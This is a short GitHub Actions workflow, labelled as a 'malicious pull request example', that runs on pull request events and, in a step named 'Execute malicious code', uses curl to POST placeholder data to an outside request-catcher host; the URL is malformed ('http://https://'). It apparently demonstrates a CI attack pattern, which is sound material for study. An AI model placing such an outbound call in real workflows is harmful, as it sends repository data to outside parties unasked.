# Malicious pull request example
name: 'PR'

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Execute malicious code
        run: |
          curl -X POST http://https://teassa.requestcatcher.com/test --data "data=test"
